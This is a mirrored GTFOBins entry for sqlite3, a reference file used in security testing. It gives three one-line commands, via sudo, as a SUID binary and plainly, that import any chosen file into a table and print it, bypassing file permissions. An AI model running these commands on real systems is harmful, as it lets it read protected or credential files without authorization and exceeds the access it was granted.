This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-28 03:01:42 +01:00
Code
Issues
5fa7efbc1c
GTFOBins.github.io
/
_gtfobins
/
sqlite3.md
Dov Murik
5fa7efbc1c
Add base64, ltrace, make, sqlite3, time
2018-06-04 10:21:53 +00:00
554 B
Raw
Blame
History
functions
sudo-enabled
suid-enabled
file-read
code
LFILE=file_to_read sudo sqlite3 << EOF CREATE TABLE t(line TEXT); .import $LFILE t SELECT * FROM t; EOF
code
LFILE=file_to_read ./sqlite3 << EOF CREATE TABLE t(line TEXT); .import $LFILE t SELECT * FROM t; EOF
code
LFILE=file_to_read sqlite3 << EOF CREATE TABLE t(line TEXT); .import $LFILE t SELECT * FROM t; EOF